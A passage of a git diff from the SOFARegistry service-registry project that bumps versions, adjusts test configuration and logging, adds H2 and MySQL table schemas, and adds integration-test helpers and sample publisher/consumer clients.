+ PersistenceDataBuilder.createPersistenceData(dataInfoId, "val"); + + boolean success = provideDataRaftRepository.put(persistenceData, version); + Assert.assertTrue(success); + Assert.assertEquals("val", provideDataRaftRepository.get(dataInfoId).getData()); + Assert.assertEquals( + persistenceData.getVersion(), provideDataRaftRepository.get(dataInfoId).getVersion()); + boolean remove = provideDataRaftRepository.remove(dataInfoId, persistenceData.getVersion()); + + Assert.assertTrue(remove); + Assert.assertTrue(provideDataRaftRepository.get(dataInfoId) == null); + } + + @Test + public void testGetAll() { + long version = System.currentTimeMillis(); + + String dataInfoId = DataInfo.toDataInfoId("testGetAll" + version, "DEFAULT", "DEFAULT"); + PersistenceData persistenceData = + PersistenceDataBuilder.createPersistenceData(dataInfoId, "val"); + boolean success = provideDataRaftRepository.put(persistenceData, persistenceData.getVersion()); + Assert.assertTrue(success); + Assert.assertEquals("val", provideDataRaftRepository.get(dataInfoId).getData()); + Assert.assertEquals( + persistenceData.getVersion(), provideDataRaftRepository.get(dataInfoId).getVersion()); + + Collection all = provideDataRaftRepository.getAll(); + Assert.assertTrue(all.contains(persistenceData)); + } +} diff --git a/server/store/jraft/src/test/resources/application.properties b/server/store/jraft/src/test/resources/application.properties new file mode 100644 index 000000000..4b4a96ece --- /dev/null +++ b/server/store/jraft/src/test/resources/application.properties @@ -0,0 +1 @@ +meta.server.elector.lockExpireDuration=20000 \ No newline at end of file diff --git a/server/store/pom.xml b/server/store/pom.xml index 0d6a266d6..9bb93a4c0 100644 --- a/server/store/pom.xml +++ b/server/store/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-server-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -19,6 +19,7 @@ api jraft + jdbc diff --git a/test/pom.xml b/test/pom.xml index ecca9bcdb..45cf634e9 100644 --- a/test/pom.xml +++ b/test/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -14,6 +14,8 @@ ../ + + ${project.build.directory}/jacoco-it.exec @@ -35,7 +37,7 @@ com.alipay.sofa - registry-store-api + registry-store-common com.alipay.sofa @@ -43,19 +45,19 @@ com.alipay.sofa - registry-remoting-api + registry-store-jdbc com.alipay.sofa - registry-remoting-bolt + registry-remoting-api com.alipay.sofa - registry-remoting-http + registry-remoting-bolt com.alipay.sofa - registry-consistency + registry-remoting-http com.alipay.sofa @@ -79,5 +81,54 @@ registry-client-all test + + com.h2database + h2 + 1.4.200 + test + + + com.alipay.common + tracer + test + + + + + org.apache.maven.plugins + maven-surefire-plugin + 2.8.1 + + ${isSkipIntegrationTest} + + + **/*Test.java + + true + + + + test-junit + test + + test + + + none:none + org.junit:com.springsource.org.junit + -Xmx1024m -XX:PermSize=256m -XX:MaxPermSize=512m -Dfile.encoding=UTF8 + + + **/*Test.java + + + once + true + + + + + + diff --git a/test/src/main/java/com/alipay/sofa/registry/server/test/TestRegistryMain.java b/test/src/main/java/com/alipay/sofa/registry/server/test/TestRegistryMain.java index a0d98d08c..77d889804 100644 --- a/test/src/main/java/com/alipay/sofa/registry/server/test/TestRegistryMain.java +++ b/test/src/main/java/com/alipay/sofa/registry/server/test/TestRegistryMain.java @@ -16,61 +16,59 @@ */ package com.alipay.sofa.registry.server.test; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_DATA_CENTER; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_ZONE; + import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.server.integration.RegistryApplication; import com.alipay.sofa.registry.util.FileUtils; -import org.springframework.context.ConfigurableApplicationContext; - import java.io.File; import java.util.HashMap; import java.util.Map; - -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_DATA_CENTER; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_ZONE; +import org.springframework.context.ConfigurableApplicationContext; /** - @author xuanbei - @since 2019/3/9 + * @author xuanbei + * @since 2019/3/9 */ public class TestRegistryMain { - public static final String LOCAL_ADDRESS = NetUtil.getLocalAddress().getHostAddress(); + public static final String LOCAL_ADDRESS = NetUtil.getLocalAddress().getHostAddress(); - private Map configs = new HashMap<>(); + private Map configs = new HashMap<>(); - public TestRegistryMain() { - configs.put("nodes.metaNode", DEFAULT_DATA_CENTER + ":" + LOCAL_ADDRESS); - configs.put("nodes.localDataCenter", DEFAULT_DATA_CENTER); - configs.put("nodes.localRegion", DEFAULT_ZONE); - } + public TestRegistryMain() { + configs.put("nodes.metaNode", DEFAULT_DATA_CENTER + ":" + LOCAL_ADDRESS); + configs.put("nodes.localDataCenter", DEFAULT_DATA_CENTER); + configs.put("nodes.localRegion", DEFAULT_ZONE); + } - public void startRegistry() throws Exception { - for (Map.Entry entry : configs.entrySet()) { - System.setProperty(entry.getKey(), entry.getValue()); - } - FileUtils.forceDelete(new File(System.getProperty("user.home") + File.separator - + "raftData")); - RegistryApplication.main(new String[] {}); - Thread.sleep(3000); + public void startRegistry() throws Exception { + for (Map.Entry entry : configs.entrySet()) { + System.setProperty(entry.getKey(), entry.getValue()); } + FileUtils.forceDelete(new File(System.getProperty("user.home") + File.separator + "raftData")); + RegistryApplication.main(new String[] {}); + Thread.sleep(3000); + } - public void stopRegistry() throws Exception { - RegistryApplication.stop(); - } + public void stopRegistry() throws Exception { + RegistryApplication.stop(); + } - public void startRegistryWithConfig(Map configs) throws Exception { - this.configs.putAll(configs); - this.startRegistry(); - } + public void startRegistryWithConfig(Map configs) throws Exception { + this.configs.putAll(configs); + this.startRegistry(); + } - public ConfigurableApplicationContext getMetaApplicationContext() { - return RegistryApplication.getMetaApplicationContext(); - } + public ConfigurableApplicationContext getMetaApplicationContext() { + return RegistryApplication.getMetaApplicationContext(); + } - public ConfigurableApplicationContext getSessionApplicationContext() { - return RegistryApplication.getSessionApplicationContext(); - } + public ConfigurableApplicationContext getSessionApplicationContext() { + return RegistryApplication.getSessionApplicationContext(); + } - public ConfigurableApplicationContext getDataApplicationContext() { - return RegistryApplication.getDataApplicationContext(); - } + public ConfigurableApplicationContext getDataApplicationContext() { + return RegistryApplication.getDataApplicationContext(); + } } diff --git a/test/src/main/resources/application.properties b/test/src/main/resources/application.properties index 20ce078a6..16fa61744 100644 --- a/test/src/main/resources/application.properties +++ b/test/src/main/resources/application.properties @@ -7,22 +7,29 @@ session.server.serverPort=9600 session.server.httpServerPort=9603 session.server.metaServerPort=9610 session.server.dataServerPort=9620 +session.server.syncSessionPort=9602 session.server.sessionServerRegion=DEFAULT_ZONE session.server.sessionServerDataCenter=DefaultDataCenter session.server.syncHeartbeat.fixedDelay=30000 session.server.syncExceptionData.fixedDelay=30000 session.server.printTask.fixedDelay=30000 -session.server.schedulerHeartbeatTimeout=30 -session.server.schedulerHeartbeatFirstDelay=30 -session.server.schedulerHeartbeatExpBackOffBound=10 +session.server.schedulerHeartbeatTimeout=3 +session.server.schedulerHeartbeatFirstDelay=3 +session.server.schedulerHeartbeatExpBackOffBound=1 session.server.schedulerFetchDataTimeout=3 session.server.schedulerFetchDataFirstDelay=3 session.server.schedulerFetchDataExpBackOffBound=10 +session.server.renewAndSnapshotSilentPeriodSec=10 +session.server.renewDatumWheelTaskDelaySec=10 +session.server.renewDatumWheelTaskRandomFirstDelaySec=10 +session.server.silenceHore=24 + ## data node configuration data.server.logging.level=INFO data.server.port=9620 data.server.syncDataPort=9621 +data.server.syncSessionPort=9602 data.server.httpServerPort=9622 data.server.queueCount=4 data.server.queueSize=10240 @@ -31,6 +38,7 @@ data.server.rpcTimeout=3000 data.server.metaServerPort=9611 data.server.storeNodes=3 data.server.numberOfReplicas=1000 +data.server.enableTestApi=true ## meta node configuration meta.server.logging.level=INFO @@ -40,4 +48,8 @@ meta.server.metaServerPort=9612 meta.server.raftServerPort=9614 meta.server.httpServerPort=9615 meta.server.raftGroup=MetaServerRaftGroup -meta.server.decisionMode=RUNTIME \ No newline at end of file +meta.server.decisionMode=RUNTIME + + +meta.server.elector.lockExpireDuration=20000 +meta.server.revisionGcSilenceHour=24 diff --git a/test/src/main/resources/log4j2.xml b/test/src/main/resources/log4j2.xml new file mode 100644 index 000000000..0837eb203 --- /dev/null +++ b/test/src/main/resources/log4j2.xml @@ -0,0 +1,55 @@ + + + + + ${user.home}/logs/registry/temp + INFO + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/test/src/main/resources/logback-spring.xml b/test/src/main/resources/logback-spring.xml deleted file mode 100644 index adbee9009..000000000 --- a/test/src/main/resources/logback-spring.xml +++ /dev/null @@ -1,41 +0,0 @@ - - - - - - - - - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - - - WARN - - - - true - - ${LOG_LEVEL} - - - ERROR - DENY - - ${LOG_HOME}/registry-test.log - - ${LOG_HOME}/registry-test.log.%d{yyyy-MM-dd} - 30 - - - [%d{ISO8601}][%p][%t][%c{0}] - %m%n - ${LOG_ENCODE} - - - - - - - - \ No newline at end of file diff --git a/test/src/main/resources/sql/h2/base_info.sql b/test/src/main/resources/sql/h2/base_info.sql new file mode 100644 index 000000000..e69de29bb diff --git a/test/src/main/resources/sql/h2/create_table.sql b/test/src/main/resources/sql/h2/create_table.sql new file mode 100644 index 000000000..0587c844f --- /dev/null +++ b/test/src/main/resources/sql/h2/create_table.sql @@ -0,0 +1,61 @@ +drop table if exists APP_REVISION; +create table APP_REVISION ( + id bigint unsigned not null auto_increment primary key, + data_center varchar(129) not null, + revision varchar(128) not null, + app_name varchar(128) not null, + base_params longtext default null, + service_params longtext default null, + gmt_create timestamp not null, + gmt_modified timestamp not null, + client_version varchar(512) default null, + UNIQUE KEY `uk_data_center_revision` (`data_center`, `revision`) +); + +CREATE TABLE interface_apps_index ( + id bigint(20) NOT NULL AUTO_INCREMENT, + data_center varchar(128) NOT NULL, + app_name varchar(128) NOT NULL COMMENT '应用名', + interface_name varchar(386) NOT NULL COMMENT '接口名', + gmt_create timestamp(6) NOT NULL COMMENT '创建时间', + gmt_modified timestamp(6) NOT NULL COMMENT '修改时间', + hashcode varchar(128) NOT NULL COMMENT '唯一索引hashcode', + reference tinyint(4) NOT NULL COMMENT '是否被引用', + PRIMARY KEY(id), + UNIQUE KEY `uk_hashcode` (`data_center`, `app_name`, `hashcode`), + KEY `idx_data_center_interface` (`interface_name`) +); + +CREATE TABLE distribute_lock ( + id bigint(20) NOT NULL AUTO_INCREMENT primary key, + data_center varchar(128) NOT NULL, + lock_name varchar(1024) NOT NULL, + owner varchar(512) NOT NULL, + duration bigint(20) NOT NULL, + gmt_create timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP, + gmt_modified timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP, + UNIQUE KEY `uk_data_center_lock` (`data_center`, `lock_name`), + KEY `idx_lock_owner` (`owner`) +); + +CREATE TABLE provide_data ( + id bigint(20) NOT NULL AUTO_INCREMENT primary key, + data_center varchar(128) NOT NULL, + data_key varchar(1024) NOT NULL, + data_value mediumtext DEFAULT NULL , + gmt_create timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, + gmt_modified timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, + `data_version` bigint(20) NOT NULL DEFAULT '0' COMMENT '版本号', + UNIQUE KEY `uk_data_center_key` (`data_center`, `data_key`) +); + + + + + + + + + + + diff --git a/test/src/main/resources/sql/mysql/create_table.sql b/test/src/main/resources/sql/mysql/create_table.sql new file mode 100644 index 000000000..b6147a14f --- /dev/null +++ b/test/src/main/resources/sql/mysql/create_table.sql @@ -0,0 +1,68 @@ +CREATE TABLE `app_revision` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `revision` varchar(128) NOT NULL COMMENT 'revision', + `app_name` varchar(128) NOT NULL COMMENT '应用名', + `base_params` text DEFAULT NULL COMMENT '基础参数', + `service_params` text DEFAULT NULL COMMENT '服务参数', + `gmt_create` timestamp NOT NULL COMMENT '创建时间', + `gmt_modified` timestamp NOT NULL COMMENT '修改时间', + `client_version` varchar(512) DEFAULT NULL COMMENT '客户端版本', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_revision` (`data_center`, `revision`) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 913172 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '服务元数据表' + +CREATE TABLE `interface_apps_index` ( + `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名称', + `app_name` varchar(128) NOT NULL COMMENT '应用名', + `interface_name` varchar(386) NOT NULL COMMENT '接口名', + `gmt_create` timestamp(6) NOT NULL COMMENT '创建时间', + `gmt_modified` timestamp(6) NOT NULL COMMENT '修改时间', + `hashcode` varchar(128) NOT NULL COMMENT '唯一索引hashcode', + `reference` tinyint(4) NOT NULL COMMENT '是否被引用', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_hashcode` (`data_center`, `app_name`, `hashcode`) BLOCK_SIZE 16384 GLOBAL, + KEY `idx_data_center_interface` (`interface_name`) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1469202 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = 'interface与revision索引表' + +CREATE TABLE `provide_data` ( + `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `data_key` varchar(1024) NOT NULL COMMENT 'data key', + `data_value` mediumtext DEFAULT NULL COMMENT 'data value', + `gmt_create` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', + `gmt_modified` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT '修改时间', + `data_version` bigint(20) unsigned NOT NULL DEFAULT '0' COMMENT '版本号', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_key` (`data_center`(128), `data_key`(1024)) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '注册中心配置存储表' + +CREATE TABLE `distribute_lock` ( + `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键', + `data_center` varchar(128) NOT NULL COMMENT '集群名', + `lock_name` varchar(1024) NOT NULL COMMENT '分布式锁名称', + `owner` varchar(512) NOT NULL COMMENT '锁拥有者', + `duration` bigint(20) NOT NULL COMMENT '持续周期', + `gmt_create` timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3) COMMENT '创建时间', + `gmt_modified` timestamp(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3) ON UPDATE CURRENT_TIMESTAMP(3) COMMENT '修改时间', + PRIMARY KEY (`id`), + UNIQUE KEY `uk_data_center_lock` (`data_center`(128), `lock_name`(1024)) BLOCK_SIZE 16384 GLOBAL, + KEY `idx_lock_owner` (`owner`(512)) BLOCK_SIZE 16384 GLOBAL +) AUTO_INCREMENT = 1 DEFAULT CHARSET = utf8mb4 ROW_FORMAT = DYNAMIC COMPRESSION = 'zstd_1.0' REPLICA_NUM = 3 BLOCK_SIZE = 16384 USE_BLOOM_FILTER = FALSE TABLET_SIZE = 134217728 PCTFREE = 10 COMMENT = '分布式锁' + + + + + + + + + + + + + + + + diff --git a/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryApplicationTest.java b/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryApplicationTest.java new file mode 100644 index 000000000..2ac7f5dde --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryApplicationTest.java @@ -0,0 +1,21 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.integration; + +import static org.junit.Assert.*; + +public class RegistryApplicationTest {} diff --git a/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryConsumer.java b/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryConsumer.java new file mode 100644 index 000000000..0e102d0f7 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryConsumer.java @@ -0,0 +1,76 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.integration; + +import com.alipay.sofa.registry.client.api.Subscriber; +import com.alipay.sofa.registry.client.api.SubscriberDataObserver; +import com.alipay.sofa.registry.client.api.model.UserData; +import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; +import com.alipay.sofa.registry.client.provider.DefaultRegistryClient; +import com.alipay.sofa.registry.client.provider.DefaultRegistryClientConfigBuilder; +import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; + +/** + * @author chen.zhu + *

Nov 18, 2020 + */ +public class RegistryConsumer { + + private static final Logger logger = LoggerFactory.getLogger(RegistryConsumer.class); + + public static void main(String[] args) throws InterruptedException { + DefaultRegistryClient registryClient = + new DefaultRegistryClient( + new DefaultRegistryClientConfigBuilder() + .setRegistryEndpoint("127.0.0.1") + .setRegistryEndpointPort(9603) + .build()); + registryClient.init(); + + // 构造订阅者注册表 + String dataId = "com.alipay.test.demo.service:1.0@DEFAULT"; + SubscriberRegistration registration = + new SubscriberRegistration( + dataId, + new SubscriberDataObserver() { + @Override + public void handleData(String dataId, UserData userData) { + // UserData 中包含有 zoneData 和 localZone, + // zoneData 中是服务端推送过来的多个 zone 以及 zone 内发布的数据列表 + // localZone 表示当前应用处于哪个 zone。 + logger.info("receive data success, dataId: {}, data: {}", dataId, userData); + } + }); + // 订阅者分组必须和发布者分组一致,未设置默认为 DEFAULT_GROUP + registration.setGroup("TEST_GROUP"); + registration.setAppName("test-app"); + // 设置订阅维度,ScopeEnum 共有三种级别 zone, dataCenter, global。 + // zone: 逻辑机房内订阅,仅可订阅到应用所处逻辑机房内的发布者发布的数据 + // dataCenter: 机房内订阅,可订阅到应用所处机房内的发布者发布的数据 + // global: 全局订阅,可订阅到当前服务注册中心部署的所有机房内的发布者发布的数据 + registration.setScopeEnum(ScopeEnum.global); + + // 将注册表注册进客户端获取订阅者模型,订阅到的数据会以回调的方式通知 `SubscriberDataObserver` + Subscriber subscriber = registryClient.register(registration); + + while (!Thread.currentThread().isInterrupted()) { + Thread.sleep(10000); + } + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryProvider.java b/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryProvider.java new file mode 100644 index 000000000..7105d6e00 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/server/integration/RegistryProvider.java @@ -0,0 +1,56 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.integration; + +import com.alipay.sofa.registry.client.api.Publisher; +import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; +import com.alipay.sofa.registry.client.provider.DefaultRegistryClient; +import com.alipay.sofa.registry.client.provider.DefaultRegistryClientConfigBuilder; + +/** + * @author chen.zhu + *

Nov 18, 2020 + */ +public class RegistryProvider { + + public static void main(String[] args) throws InterruptedException { + + DefaultRegistryClient registryClient = + new DefaultRegistryClient( + new DefaultRegistryClientConfigBuilder() + .setRegistryEndpoint("127.0.0.1") + .setRegistryEndpointPort(9603) + .build()); + registryClient.init(); + // 构造发布者注册表 + String dataId = "com.alipay.test.demo.service:1.0@DEFAULT"; + PublisherRegistration registration = new PublisherRegistration(dataId); + // 如需指定分组,可主动设置分组,未设置默认为 DEFAULT_GROUP + registration.setGroup("TEST_GROUP"); + // 设置应用名,非必要条件 + registration.setAppName("test-app"); + + // 将注册表注册进客户端获取发布者模型,并发布数据 + Publisher publisher = registryClient.register(registration, "127.0.0.1:12200?xx=zz"); + + while (!Thread.currentThread().isInterrupted()) { + Thread.sleep(10000); + } + // 如需覆盖上次发布的数据可以使用发布者模型重新发布数据 + // publisher.republish("10.10.1.1:12200?xx=zz"); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/AbstractTest.java b/test/src/test/java/com/alipay/sofa/registry/test/AbstractTest.java new file mode 100644 index 000000000..863517713 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/AbstractTest.java @@ -0,0 +1,286 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.observer.Observable; +import com.alipay.sofa.registry.observer.UnblockingObserver; +import com.alipay.sofa.registry.util.NamedThreadFactory; +import io.netty.util.ResourceLeakDetector; +import java.io.IOException; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Modifier; +import java.net.InetSocketAddress; +import java.net.ServerSocket; +import java.util.Collections; +import java.util.Map; +import java.util.Random; +import java.util.Set; +import java.util.concurrent.*; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.function.BooleanSupplier; +import org.junit.After; +import org.junit.Before; +import org.junit.BeforeClass; +import org.junit.Rule; +import org.junit.rules.TestName; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public class AbstractTest { + + protected final Logger logger = LoggerFactory.getLogger(getClass()); + + protected ExecutorService executors; + + protected ScheduledExecutorService scheduled; + + @Rule public TestName name = new TestName(); + + public static final Random random = new Random(); + + @BeforeClass + public static void beforeAbstractTestClass() { + System.setProperty("spring.main.show_banner", "false"); + } + + @Before + public void beforeAbstractTest() throws Exception { + + ResourceLeakDetector.setLevel(ResourceLeakDetector.Level.PARANOID); + Thread.interrupted(); // clear interrupt + + executors = Executors.newCachedThreadPool(new NamedThreadFactory(name.getMethodName())); + scheduled = + Executors.newScheduledThreadPool( + Runtime.getRuntime().availableProcessors(), + new NamedThreadFactory("sched-" + name.getMethodName())); + if (logger.isInfoEnabled()) { + logger.info(remarkableMessage("[begin test][{}]"), name.getMethodName()); + } + } + + @After + public void afterAbstractTest() + throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException { + executors.shutdownNow(); + scheduled.shutdownNow(); + + logger.info(remarkableMessage("[end test][{}]"), name.getMethodName()); + } + + protected static void setEnv(Map newenv) throws Exception { + try { + Class processEnvironmentClass = Class.forName("java.lang.ProcessEnvironment"); + Field theEnvironmentField = processEnvironmentClass.getDeclaredField("theEnvironment"); + theEnvironmentField.setAccessible(true); + Map env = (Map) theEnvironmentField.get(null); + env.putAll(newenv); + Field theCaseInsensitiveEnvironmentField = + processEnvironmentClass.getDeclaredField("theCaseInsensitiveEnvironment"); + theCaseInsensitiveEnvironmentField.setAccessible(true); + Map cienv = + (Map) theCaseInsensitiveEnvironmentField.get(null); + cienv.putAll(newenv); + } catch (NoSuchFieldException e) { + Class[] classes = Collections.class.getDeclaredClasses(); + Map env = System.getenv(); + for (Class cl : classes) { + if ("java.util.Collections$UnmodifiableMap".equals(cl.getName())) { + Field field = cl.getDeclaredField("m"); + field.setAccessible(true); + Object obj = field.get(env); + Map map = (Map) obj; + map.clear(); + map.putAll(newenv); + } + } + } + } + + public static void setFinalStatic(Field field, Object newValue) throws Exception { + field.setAccessible(true); + + Field modifiersField = Field.class.getDeclaredField("modifiers"); + modifiersField.setAccessible(true); + modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL); + + field.set(null, newValue); + } + + protected String remarkableMessage(String msg) { + return String.format("--------------------------%s--------------------------\r\n", msg); + } + + protected void waitForAnyKeyToExit() throws IOException { + logger.info("type any key to exit.................."); + waitForAnyKey(); + } + + protected void waitForAnyKey() throws IOException { + System.in.read(); + } + + protected void waitConditionUntilTimeOut(BooleanSupplier booleanSupplier) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, 5000, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, waitTimeMilli, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli, int intervalMilli) + throws TimeoutException, InterruptedException { + + long maxTime = System.currentTimeMillis() + waitTimeMilli; + + while (true) { + boolean result = booleanSupplier.getAsBoolean(); + if (result) { + return; + } + if (System.currentTimeMillis() >= maxTime) { + throw new TimeoutException("timeout still false:" + waitTimeMilli); + } + Thread.sleep(intervalMilli); + } + } + + public static int randomPort() { + return randomPort(10000, 20000, null); + } + + public static int randomPort(int min, int max, Set different) { + + Random random = new Random(); + + for (int i = min; i <= max; i++) { + int port = min + random.nextInt(max - min + 1); + if ((different == null || !different.contains(port)) && isUsable(port)) { + return port; + } + } + + throw new IllegalStateException(String.format("random port not found:(%d, %d)", min, max)); + } + + public static int netmask = (1 << 8) - 1; + + public static String randomIp() { + return String.format( + "%d.%d.%d.%d", + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1)); + } + + protected static boolean isUsable(int port) { + + try (ServerSocket s = new ServerSocket()) { + s.bind(new InetSocketAddress(port)); + return true; + } catch (IOException e) { + } + return false; + } + + public static String getDc() { + return "DEFAULT_DC"; + } + + public static String randomString() { + + return randomString(1 << 10); + } + + public static String randomString(int length) { + + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + sb.append((char) ('a' + (int) (26 * Math.random()))); + } + + return sb.toString(); + } + + public static class NotifyObserversCounter implements UnblockingObserver { + + private final AtomicInteger counter = new AtomicInteger(0); + + @Override + public void update(Observable source, Object message) { + counter.getAndIncrement(); + } + + public int getCounter() { + return counter.get(); + } + } + + public static class ConcurrentExecutor implements Executor { + + private final int tasks; + + private final CyclicBarrier barrier; + + private final CountDownLatch latch; + + private final ExecutorService executors; + + public ConcurrentExecutor(int tasks, ExecutorService executors) { + this.tasks = tasks; + this.barrier = new CyclicBarrier(tasks); + this.latch = new CountDownLatch(tasks); + this.executors = executors; + } + + @Override + public void execute(final Runnable command) { + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + command.run(); + } catch (Exception ignore) { + } + + latch.countDown(); + } + }); + } + try { + latch.await(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/BaseIntegrationTest.java b/test/src/test/java/com/alipay/sofa/registry/test/BaseIntegrationTest.java index 94c48416c..b029987e1 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/BaseIntegrationTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/BaseIntegrationTest.java @@ -16,6 +16,10 @@ */ package com.alipay.sofa.registry.test; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.assertTrue; + +import com.alipay.common.tracer.context.AbstractLogContext; import com.alipay.remoting.Connection; import com.alipay.sofa.registry.client.api.RegistryClientConfig; import com.alipay.sofa.registry.client.api.SubscriberDataObserver; @@ -27,230 